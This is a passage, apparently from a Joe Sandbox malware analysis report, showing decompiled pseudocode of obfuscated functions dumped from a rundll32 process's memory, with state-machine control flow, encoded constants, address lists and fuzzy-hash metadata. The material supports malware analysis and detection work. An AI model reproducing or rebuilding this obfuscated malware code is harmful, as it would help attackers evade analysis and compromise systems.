                                                                                                                      				signed int* _t122;
                                                                                                                      
                                                                                                                      				_t122 =  &_v40;
                                                                                                                      				_v16 = 0x36dfa5;
                                                                                                                      				_v16 = _v16 + 0x3b08;
                                                                                                                      				_t107 = __ecx;
                                                                                                                      				_t119 = 0;
                                                                                                                      				_t109 = 0x6b;
                                                                                                                      				_v16 = _v16 / _t109;
                                                                                                                      				_v16 = _v16 ^ 0x0008b2f0;
                                                                                                                      				_t120 = 0x25318c3;
                                                                                                                      				_v32 = 0xe406cb;
                                                                                                                      				_v32 = _v32 + 0xf1ff;
                                                                                                                      				_v32 = _v32 << 0xd;
                                                                                                                      				_t110 = 0x38;
                                                                                                                      				_v32 = _v32 / _t110;
                                                                                                                      				_v32 = _v32 ^ 0x02d3dd20;
                                                                                                                      				_v36 = 0x75fef9;
                                                                                                                      				_v36 = _v36 >> 0xe;
                                                                                                                      				_v36 = _v36 + 0x1d86;
                                                                                                                      				_v36 = _v36 | 0xca94675a;
                                                                                                                      				_v36 = _v36 ^ 0xca99002d;
                                                                                                                      				_v20 = 0xf78cd;
                                                                                                                      				_v20 = _v20 * 0x50;
                                                                                                                      				_v20 = _v20 >> 4;
                                                                                                                      				_v20 = _v20 ^ 0x004e8f0d;
                                                                                                                      				_v24 = 0x451f1c;
                                                                                                                      				_v24 = _v24 + 0xffffecca;
                                                                                                                      				_v24 = _v24 + 0xffffe02c;
                                                                                                                      				_v24 = _v24 ^ 0x0044bfd9;
                                                                                                                      				_v40 = 0xfdbfec;
                                                                                                                      				_v40 = _v40 << 8;
                                                                                                                      				_v40 = _v40 + 0x2a17;
                                                                                                                      				_v40 = _v40 ^ 0x2ee485ab;
                                                                                                                      				_v40 = _v40 ^ 0xd32b8602;
                                                                                                                      				_v28 = 0xc36f29;
                                                                                                                      				_v28 = _v28 >> 0xa;
                                                                                                                      				_v28 = _v28 + 0xffff93a5;
                                                                                                                      				_v28 = _v28 ^ 0xfffd5496;
                                                                                                                      				_v4 = 0xb22cca;
                                                                                                                      				_v4 = _v4 * 0x61;
                                                                                                                      				_v4 = _v4 ^ 0x438b1823;
                                                                                                                      				_v8 = 0x4d4bc7;
                                                                                                                      				_v8 = _v8 + 0xffff7d22;
                                                                                                                      				_v8 = _v8 ^ 0x00436970;
                                                                                                                      				_v12 = 0xfbac3c;
                                                                                                                      				_v12 = _v12 | 0x3e605f41;
                                                                                                                      				_v12 = _v12 << 4;
                                                                                                                      				_v12 = _v12 ^ 0xefb5eaa0;
                                                                                                                      				do {
                                                                                                                      					while(_t120 != 0x25318c3) {
                                                                                                                      						if(_t120 == 0x409e50d) {
                                                                                                                      							_t103 = E00821B4F();
                                                                                                                      							_t122 = _t122 - 0xc + 0xc;
                                                                                                                      							_t120 = 0x7f367f8;
                                                                                                                      							_t119 = _t119 + _t103;
                                                                                                                      							continue;
                                                                                                                      						} else {
                                                                                                                      							if(_t120 == 0x7f367f8) {
                                                                                                                      								_t104 = E0081AB82(_t107 + 0xc, _v24, _v40, _v28);
                                                                                                                      								_t122 =  &(_t122[2]);
                                                                                                                      								_t120 = 0xdeee07a;
                                                                                                                      								_t119 = _t119 + _t104;
                                                                                                                      								continue;
                                                                                                                      							} else {
                                                                                                                      								if(_t120 != 0xdeee07a) {
                                                                                                                      									goto L10;
                                                                                                                      								} else {
                                                                                                                      									_t119 = _t119 + E0081AB82(_t107 + 4, _v4, _v8, _v12);
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      						L6:
                                                                                                                      						return _t119;
                                                                                                                      					}
                                                                                                                      					_t120 = 0x409e50d;
                                                                                                                      					L10:
                                                                                                                      				} while (_t120 != 0xb6d7b22);
                                                                                                                      				goto L6;
                                                                                                                      			}






















                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.510076235.0000000000810000.00000040.00000800.00020000.00000000.sdmp, Offset: 00810000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_810000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: -$A_`>$piC$z$z
                                                                                                                      • API String ID: 0-2268621895
                                                                                                                      • Opcode ID: c925c1865817eedd0fadeedc6ca736b8d814e838a0fef344f25dca19e791c3cd
                                                                                                                      • Instruction ID: 1709b7669d33f6d5e1906dc19183f783034b807282e4049ef461da73e9bb1039
                                                                                                                      • Opcode Fuzzy Hash: c925c1865817eedd0fadeedc6ca736b8d814e838a0fef344f25dca19e791c3cd
                                                                                                                      • Instruction Fuzzy Hash: 89413BB29093019FC344CF25D58944BFBE1FBD4758F019A2DF499A6220D774CA498F97
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 96%
                                                                                                                      			E0082C089(intOrPtr* __edx, intOrPtr* _a4, intOrPtr _a8) {
                                                                                                                      				char _v8;
                                                                                                                      				intOrPtr _v12;
                                                                                                                      				signed int _v16;
                                                                                                                      				signed int _v20;
                                                                                                                      				signed int _v24;
                                                                                                                      				signed int _v28;
                                                                                                                      				signed int _v32;
                                                                                                                      				signed int _v36;
                                                                                                                      				signed int _v40;
                                                                                                                      				signed int _v44;
                                                                                                                      				signed int _v48;
                                                                                                                      				signed int _v52;
                                                                                                                      				signed int _v56;
                                                                                                                      				signed int _v60;
                                                                                                                      				signed int _v64;
                                                                                                                      				signed int _v68;
                                                                                                                      				signed int _v72;
                                                                                                                      				signed int _v76;
                                                                                                                      				signed int _v80;
                                                                                                                      				signed int _v84;
                                                                                                                      				signed int _v88;
                                                                                                                      				signed int _v92;
                                                                                                                      				signed int _v96;
                                                                                                                      				signed int _v100;
                                                                                                                      				signed int _v104;
                                                                                                                      				signed int _v108;
                                                                                                                      				signed int _v112;
                                                                                                                      				signed int _v116;
                                                                                                                      				void* __ecx;
                                                                                                                      				void* _t283;
                                                                                                                      				void* _t316;
                                                                                                                      				intOrPtr _t320;
                                                                                                                      				void* _t325;
                                                                                                                      				intOrPtr* _t328;
                                                                                                                      				void* _t330;
                                                                                                                      				void* _t365;
                                                                                                                      				signed int _t368;
                                                                                                                      				signed int _t369;
                                                                                                                      				signed int _t370;
                                                                                                                      				signed int _t371;
                                                                                                                      				signed int _t372;
                                                                                                                      				signed int _t373;
                                                                                                                      				signed int _t374;
                                                                                                                      				signed int _t375;
                                                                                                                      				signed int _t376;
                                                                                                                      				signed int _t377;
                                                                                                                      				signed int _t378;
                                                                                                                      				signed int* _t381;
                                                                                                                      
                                                                                                                      				_t367 = _a4;
                                                                                                                      				_t328 = __edx;
                                                                                                                      				_push(_a8);
                                                                                                                      				_push(_a4);
                                                                                                                      				_push(__edx);
                                                                                                                      				E0081C325(_t283);
                                                                                                                      				_v60 = 0x688185;
                                                                                                                      				_t381 =  &(( &_v116)[4]);
                                                                                                                      				_v60 = _v60 ^ 0x6a5ee641;
                                                                                                                      				_t6 =  &_v60; // 0x6a5ee641
                                                                                                                      				_t365 = 0;
                                                                                                                      				_t330 = 0xb7d839b;
                                                                                                                      				_t368 = 0x77;
                                                                                                                      				_v60 =  *_t6 * 0x53;
                                                                                                                      				_v60 = _v60 ^ 0x6fa3a48d;
                                                                                                                      				_v36 = 0x2ce9a9;
                                                                                                                      				_v36 = _v36 / _t368;
                                                                                                                      				_v36 = _v36 ^ 0x0000609f;
                                                                                                                      				_v72 = 0x8d05d4;
                                                                                                                      				_v72 = _v72 + 0xfffff9ae;
                                                                                                                      				_v72 = _v72 + 0xfffffb99;
                                                                                                                      				_v72 = _v72 + 0xffff1821;
                                                                                                                      				_v72 = _v72 ^ 0x008c133c;
                                                                                                                      				_v84 = 0xdf93a7;
                                                                                                                      				_v84 = _v84 + 0x158a;
                                                                                                                      				_v84 = _v84 | 0xa6edaf65;
                                                                                                                      				_v84 = _v84 ^ 0xa6ffaf75;
                                                                                                                      				_v16 = 0x181fb2;
                                                                                                                      				_v16 = _v16 >> 0xb;
                                                                                                                      				_v16 = _v16 ^ 0x00000303;
                                                                                                                      				_v40 = 0xf7fe46;
                                                                                                                      				_v40 = _v40 >> 4;
                                                                                                                      				_v40 = _v40 ^ 0x000f7fe4;
                                                                                                                      				_v96 = 0x7307ab;
                                                                                                                      				_v96 = _v96 + 0xffff98a0;
                                                                                                                      				_v96 = _v96 ^ 0x207b23a6;
                                                                                                                      				_t369 = 7;
                                                                                                                      				_v96 = _v96 / _t369;
                                                                                                                      				_v96 = _v96 ^ 0x0493a521;
                                                                                                                      				_v68 = 0xb0f7c2;
                                                                                                                      				_v68 = _v68 + 0xa001;
                                                                                                                      				_v68 = _v68 + 0xf927;
                                                                                                                      				_t370 = 0x1b;
                                                                                                                      				_v68 = _v68 / _t370;
                                                                                                                      				_v68 = _v68 ^ 0x0001298b;
                                                                                                                      				_v20 = 0x9a8fe8;
                                                                                                                      				_v20 = _v20 >> 0xb;
                                                                                                                      				_v20 = _v20 ^ 0x0008eae3;
                                                                                                                      				_v76 = 0xc447f;
                                                                                                                      				_v76 = _v76 << 2;
                                                                                                                      				_v76 = _v76 ^ 0x6da7c905;
                                                                                                                      				_v76 = _v76 | 0x8e440162;
                                                                                                                      				_v76 = _v76 ^ 0xefde5c32;
                                                                                                                      				_v80 = 0xe5293a;
                                                                                                                      				_v80 = _v80 ^ 0x7ea2fbd4;
                                                                                                                      				_v80 = _v80 << 6;
                                                                                                                      				_v80 = _v80 >> 0x10;
                                                                                                                      				_v80 = _v80 ^ 0x000bb464;
                                                                                                                      				_v24 = 0xaea513;
                                                                                                                      				_v24 = _v24 ^ 0xb7e1a43c;
                                                                                                                      				_v24 = _v24 ^ 0xb74b462d;
                                                                                                                      				_v28 = 0x6b2191;
                                                                                                                      				_v28 = _v28 | 0x9c0eb3e2;
                                                                                                                      				_v28 = _v28 ^ 0x9c639c10;
                                                                                                                      				_v32 = 0x4e8823;
                                                                                                                      				_t371 = 0xe;
                                                                                                                      				_v32 = _v32 / _t371;
                                                                                                                      				_v32 = _v32 ^ 0x000823cf;
                                                                                                                      				_v88 = 0x8b37c7;
                                                                                                                      				_v88 = _v88 + 0x96e4;
                                                                                                                      				_t372 = 0x63;
                                                                                                                      				_v88 = _v88 / _t372;
                                                                                                                      				_t373 = 0x18;
                                                                                                                      				_v88 = _v88 / _t373;
                                                                                                                      				_v88 = _v88 ^ 0x000cd8d0;
                                                                                                                      				_v92 = 0x8ccaf;
                                                                                                                      				_v92 = _v92 + 0xffff7c77;
                                                                                                                      				_v92 = _v92 >> 7;
                                                                                                                      				_t374 = 0x1a;
                                                                                                                      				_v92 = _v92 * 0x4a;
                                                                                                                      				_v92 = _v92 ^ 0x000ee576;
                                                                                                                      				_v100 = 0x6d8220;
                                                                                                                      				_v100 = _v100 + 0xffffba59;
                                                                                                                      				_v100 = _v100 / _t374;
                                                                                                                      				_v100 = _v100 + 0x20d5;
                                                                                                                      				_v100 = _v100 ^ 0x000e9a10;
                                                                                                                      				_v104 = 0xccaba6;
                                                                                                                      				_t375 = 0x29;
                                                                                                                      				_v104 = _v104 / _t375;
                                                                                                                      				_t376 = 0x69;
                                                                                                                      				_v104 = _v104 / _t376;
                                                                                                                      				_v104 = _v104 + 0xffff1a57;
                                                                                                                      				_v104 = _v104 ^ 0xfff2229f;
                                                                                                                      				_v44 = 0x73a08b;
                                                                                                                      				_v44 = _v44 / _t376;
                                                                                                                      				_v44 = _v44 ^ 0x0004e5c5;
                                                                                                                      				_v108 = 0xb1e3bd;
                                                                                                                      				_v108 = _v108 ^ 0x0f8130c9;
                                                                                                                      				_v108 = _v108 + 0x5ac4;
                                                                                                                      				_t377 = 0x21;
                                                                                                                      				_v108 = _v108 / _t377;
                                                                                                                      				_v108 = _v108 ^ 0x0077ef5a;
                                                                                                                      				_v112 = 0x4cec76;
                                                                                                                      				_t192 =  &_v112; // 0x4cec76
                                                                                                                      				_v112 =  *_t192 * 0x1a;
                                                                                                                      				_v112 = _v112 + 0xdd93;
                                                                                                                      				_v112 = _v112 << 6;
                                                                                                                      				_v112 = _v112 ^ 0xf432eb29;
                                                                                                                      				_v116 = 0x879801;
                                                                                                                      				_v116 = _v116 + 0x9229;
                                                                                                                      				_v116 = _v116 << 3;
                                                                                                                      				_v116 = _v116 | 0xee96daec;
                                                                                                                      				_v116 = _v116 ^ 0xeed13984;
                                                                                                                      				_v64 = 0x9b79ce;
                                                                                                                      				_v64 = _v64 >> 0xe;
                                                                                                                      				_t378 = 0x5f;
                                                                                                                      				_v64 = _v64 * 0x1e;
                                                                                                                      				_v64 = _v64 | 0xf7dc9e8a;
                                                                                                                      				_v64 = _v64 ^ 0xf7d2a70d;
                                                                                                                      				_v48 = 0x898fb;
                                                                                                                      				_v48 = _v48 << 0xa;
                                                                                                                      				_v48 = _v48 * 0x4f;
                                                                                                                      				_v48 = _v48 ^ 0x9cd9bf24;
                                                                                                                      				_v52 = 0xd43737;
                                                                                                                      				_v52 = _v52 << 9;
                                                                                                                      				_v52 = _v52 / _t378;
                                                                                                                      				_v52 = _v52 ^ 0x01c68cd1;
                                                                                                                      				_v56 = 0x1c405f;
                                                                                                                      				_v56 = _v56 >> 0xa;
                                                                                                                      				_v56 = _v56 | 0xb1ef7bec;
                                                                                                                      				_v56 = _v56 ^ 0xb1edddf2;
                                                                                                                      				do {
                                                                                                                      					while(_t330 != 0x6ea4fc1) {
                                                                                                                      						if(_t330 == 0x7f0f713) {
                                                                                                                      							_push(_t330);
                                                                                                                      							_push(_t330);
                                                                                                                      							_t320 = E00822912(_v8);
                                                                                                                      							_v12 = _t320;
                                                                                                                      							if(_t320 != 0) {
                                                                                                                      								_t330 = 0xa80f622;
                                                                                                                      								continue;
                                                                                                                      							}
                                                                                                                      						} else {
                                                                                                                      							if(_t330 == 0x7f61550) {
                                                                                                                      								E00815CDE(_v64, _v48, _v52, _v56, _v12);
                                                                                                                      							} else {
                                                                                                                      								if(_t330 == 0xa80f622) {
                                                                                                                      									_t253 =  *0x10025c9c + 0x50; // 0x8b08458b
                                                                                                                      									_t325 = E0081A735(_v100,  *_t367, _v104,  *_t253, _v36, _t330, _v40,  &_v8, _v44,  *((intOrPtr*)(_t367 + 4)), _v108, _v112, _v12, _v116, _t330, _v8);
                                                                                                                      									_t381 =  &(_t381[0xe]);
                                                                                                                      									if(_t325 == _v96) {
                                                                                                                      										 *_t328 = _v12;
                                                                                                                      										_t365 = 1;
                                                                                                                      										 *((intOrPtr*)(_t328 + 4)) = _v8;
                                                                                                                      									} else {
                                                                                                                      										_t330 = 0x7f61550;
                                                                                                                      										continue;
                                                                                                                      									}
                                                                                                                      								} else {
                                                                                                                      									if(_t330 != 0xb7d839b) {
                                                                                                                      										goto L14;
                                                                                                                      									} else {
                                                                                                                      										_t330 = 0x6ea4fc1;
                                                                                                                      										continue;
                                                                                                                      									}
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      						L18:
                                                                                                                      						return _t365;
                                                                                                                      					}
                                                                                                                      					_t271 =  *0x10025c9c + 0x50; // 0x8b08458b
                                                                                                                      					_t316 = E0081A735(_v68,  *_t367, _v20,  *_t271, _v60, _t330, _v72,  &_v8, _v76,  *((intOrPtr*)(_t367 + 4)), _v80, _v24, _t365, _v28, _t330, _v84);
                                                                                                                      					_t381 =  &(_t381[0xe]);
                                                                                                                      					if(_t316 != _v16) {
                                                                                                                      						_t330 = 0x33d9eeb;
                                                                                                                      						goto L14;
                                                                                                                      					} else {
                                                                                                                      						_t330 = 0x7f0f713;
                                                                                                                      						continue;
                                                                                                                      					}
                                                                                                                      					goto L18;
                                                                                                                      					L14:
                                                                                                                      				} while (_t330 != 0x33d9eeb);
                                                                                                                      				goto L18;
                                                                                                                      			}



















































                                                                                                                      0x0082c4da
                                                                                                                      0x0082c58f
                                                                                                                      0x0082c591
                                                                                                                      0x0082c596
                                                                                                                      0x0082c4e0
                                                                                                                      0x0082c4e0
                                                                                                                      0x00000000
                                                                                                                      0x0082c4e0
                                                                                                                      0x0082c476
                                                                                                                      0x0082c47c
                                                                                                                      0x00000000
                                                                                                                      0x0082c482
                                                                                                                      0x0082c482
                                                                                                                      0x00000000
                                                                                                                      0x0082c482
                                                                                                                      0x0082c47c
                                                                                                                      0x0082c474
                                                                                                                      0x0082c468
                                                                                                                      0x0082c5b7
                                                                                                                      0x0082c5c0
                                                                                                                      0x0082c5c0
                                                                                                                      0x0082c54e
                                                                                                                      0x0082c55e
                                                                                                                      0x0082c563
                                                                                                                      0x0082c56a
                                                                                                                      0x0082c576
                                                                                                                      0x00000000
                                                                                                                      0x0082c56c
                                                                                                                      0x0082c56c
                                                                                                                      0x00000000
                                                                                                                      0x0082c56c
                                                                                                                      0x00000000
                                                                                                                      0x0082c57b
                                                                                                                      0x0082c57b
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.510076235.0000000000810000.00000040.00000800.00020000.00000000.sdmp, Offset: 00810000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_810000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: :)$A^j$Zw$vL
                                                                                                                      • API String ID: 0-3297297485
                                                                                                                      • Opcode ID: c64f724e3b14af37d14ba421015a8f9ebe62776fa4678a0838c69d0e799ec206
                                                                                                                      • Instruction ID: a42bab540e8670e95cc6b347a111217de9aa778b856910534bc9c061029211e8
                                                                                                                      • Opcode Fuzzy Hash: c64f724e3b14af37d14ba421015a8f9ebe62776fa4678a0838c69d0e799ec206
                                                                                                                      • Instruction Fuzzy Hash: C6D11EB15083819FD764CF66D94992BFBE1FBC4748F10891DF29586260D7B29989CF03
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 94%
                                                                                                                      			E0081BC50(intOrPtr* __ecx) {
                                                                                                                      				signed int _v8;
                                                                                                                      				signed int _v12;
                                                                                                                      				signed int _v16;
                                                                                                                      				signed int _v20;
                                                                                                                      				signed int _v24;
                                                                                                                      				signed int _v28;
                                                                                                                      				signed int _v32;
                                                                                                                      				signed int _v36;
                                                                                                                      				signed int _v40;
                                                                                                                      				signed int _v44;
                                                                                                                      				signed int _v48;
                                                                                                                      				signed int _v52;
                                                                                                                      				signed int _v56;
                                                                                                                      				signed int _v60;
                                                                                                                      				signed int _v64;
                                                                                                                      				intOrPtr _v68;
                                                                                                                      				char _v328;
                                                                                                                      				char _t126;
                                                                                                                      				void* _t128;
                                                                                                                      				signed int _t129;
                                                                                                                      				void* _t133;
                                                                                                                      				signed int _t135;
                                                                                                                      				signed int _t136;
                                                                                                                      				char* _t137;
                                                                                                                      				intOrPtr* _t154;
                                                                                                                      
                                                                                                                      				_v64 = _v64 & 0x00000000;
                                                                                                                      				_v60 = _v60 & 0x00000000;
                                                                                                                      				_v68 = 0xeb7817;
                                                                                                                      				_v44 = 0x4dbb17;
                                                                                                                      				_v44 = _v44 >> 3;
                                                                                                                      				_v44 = _v44 ^ 0x000af917;
                                                                                                                      				_v12 = 0xca90c;
                                                                                                                      				_v12 = _v12 >> 0xf;
                                                                                                                      				_v12 = _v12 >> 0xe;
                                                                                                                      				_v12 = _v12 | 0x67e1d035;
                                                                                                                      				_v12 = _v12 ^ 0x67ebacbe;
                                                                                                                      				_v32 = 0xdd0ad5;
                                                                                                                      				_v32 = _v32 >> 6;
                                                                                                                      				_v32 = _v32 >> 0xc;
                                                                                                                      				_v32 = _v32 ^ 0x00040440;
                                                                                                                      				_v16 = 0xaefc2a;
                                                                                                                      				_v16 = _v16 ^ 0x05a88ae0;
                                                                                                                      				_t154 = __ecx;
                                                                                                                      				_t135 = 0x4a;
                                                                                                                      				_v16 = _v16 / _t135;
                                                                                                                      				_v16 = _v16 | 0x6472a2d9;
                                                                                                                      				_v16 = _v16 ^ 0x647c73c3;
                                                                                                                      				_v8 = 0x7aea22;
                                                                                                                      				_t41 =  &_v8; // 0x7aea22
                                                                                                                      				_t136 = 0x5f;
                                                                                                                      				_v8 =  *_t41 * 0x1d;
                                                                                                                      				_v8 = _v8 >> 0xa;
                                                                                                                      				_v8 = _v8 >> 7;
                                                                                                                      				_v8 = _v8 ^ 0x0003680c;
                                                                                                                      				_v28 = 0xd7a14b;
                                                                                                                      				_v28 = _v28 >> 1;
                                                                                                                      				_v28 = _v28 | 0x0e275eed;
                                                                                                                      				_v28 = _v28 ^ 0x0e6be1b9;
                                                                                                                      				_v56 = 0x693eb0;
                                                                                                                      				_t137 =  &_v328;
                                                                                                                      				_v56 = _v56 / _t136;
                                                                                                                      				_v56 = _v56 ^ 0x00052716;
                                                                                                                      				_v52 = 0x6599ea;
                                                                                                                      				_v52 = _v52 << 8;
                                                                                                                      				_v52 = _v52 ^ 0x659cef3f;
                                                                                                                      				_v36 = 0xaf3092;
                                                                                                                      				_v36 = _v36 + 0xffffd3bf;
                                                                                                                      				_v36 = _v36 ^ 0x419856f6;
                                                                                                                      				_v36 = _v36 ^ 0x413f6f4c;
                                                                                                                      				_v40 = 0x56314e;
                                                                                                                      				_v40 = _v40 ^ 0x0d0339a4;
                                                                                                                      				_v40 = _v40 >> 5;
                                                                                                                      				_v40 = _v40 ^ 0x0068e9be;
                                                                                                                      				_v20 = 0xd689b7;
                                                                                                                      				_v20 = _v20 >> 1;
                                                                                                                      				_v20 = _v20 + 0x3668;
                                                                                                                      				_v20 = _v20 ^ 0x006dcd8c;
                                                                                                                      				_v24 = 0x36edf6;
                                                                                                                      				_v24 = _v24 + 0x231d;
                                                                                                                      				_v24 = _v24 ^ 0xb40b6ffd;
                                                                                                                      				_v24 = _v24 ^ 0xb434c03a;
                                                                                                                      				_v48 = 0x867594;
                                                                                                                      				_v48 = _v48 * 0x3a;
                                                                                                                      				_v48 = _v48 ^ 0x1e7cd6f5;
                                                                                                                      				while(1) {
                                                                                                                      					_t126 =  *_t154;
                                                                                                                      					if(_t126 == 0) {
                                                                                                                      						break;
                                                                                                                      					}
                                                                                                                      					if(_t126 == 0x2e) {
                                                                                                                      						 *_t137 = 0;
                                                                                                                      					} else {
                                                                                                                      						 *_t137 = _t126;
                                                                                                                      						_t137 = _t137 + 1;
                                                                                                                      						_t154 = _t154 + 1;
                                                                                                                      						continue;
                                                                                                                      					}
                                                                                                                      					L6:
                                                                                                                      					_t128 = E00824DB7(_v44, _v12,  &_v328, _v32);
                                                                                                                      					_t155 = _t128;
                                                                                                                      					if(_t128 != 0) {
                                                                                                                      						L8:
                                                                                                                      						_t129 = E0082F25E(_v56, _t154 + 1, _v52, _v36);
                                                                                                                      						_push(_v48);
                                                                                                                      						_push(_v24);
                                                                                                                      						_push(_v20);
                                                                                                                      						_push(_v40);
                                                                                                                      						return E0081E6C1(_t155, _t129 ^ 0x3e95e426);
                                                                                                                      					}
                                                                                                                      					_t133 = E0082ED49(_v16, _v8,  &_v328, _v28);
                                                                                                                      					_t155 = _t133;
                                                                                                                      					if(_t133 != 0) {
                                                                                                                      						goto L8;
                                                                                                                      					}
                                                                                                                      					return _t133;
                                                                                                                      				}
                                                                                                                      				goto L6;
                                                                                                                      			}




























                                                                                                                      0x0081bdce
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0081bdc4
                                                                                                                      0x0081bdd2
                                                                                                                      0x0081bdc6
                                                                                                                      0x0081bdc6
                                                                                                                      0x0081bdc8
                                                                                                                      0x0081bdc9
                                                                                                                      0x00000000
                                                                                                                      0x0081bdc9
                                                                                                                      0x0081bdd5
                                                                                                                      0x0081bde5
                                                                                                                      0x0081bdea
                                                                                                                      0x0081bdf0
                                                                                                                      0x0081be0f
                                                                                                                      0x0081be1b
                                                                                                                      0x0081be20
                                                                                                                      0x0081be2a
                                                                                                                      0x0081be2f
                                                                                                                      0x0081be32
                                                                                                                      0x00000000
                                                                                                                      0x0081be3a
                                                                                                                      0x0081be02
                                                                                                                      0x0081be07
                                                                                                                      0x0081be0d
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0081be42
                                                                                                                      0x0081be42
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.510076235.0000000000810000.00000040.00000800.00020000.00000000.sdmp, Offset: 00810000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_810000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: "z$Lo?A$N1V$h6
                                                                                                                      • API String ID: 0-3272725346
                                                                                                                      • Opcode ID: 4560ea773100d6c33708da93f2f605071fff66f43b738e700dd77952ab7016f5
                                                                                                                      • Instruction ID: d54d20838cad1112896cb776699569119906aa13f7bb73c30245afb4cb886ee1
                                                                                                                      • Opcode Fuzzy Hash: 4560ea773100d6c33708da93f2f605071fff66f43b738e700dd77952ab7016f5
                                                                                                                      • Instruction Fuzzy Hash: 79513F32C0121EEBCF09CFA4D94A6EEBBB1FF54308F208199D511B6260D7B50A49CFA5
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%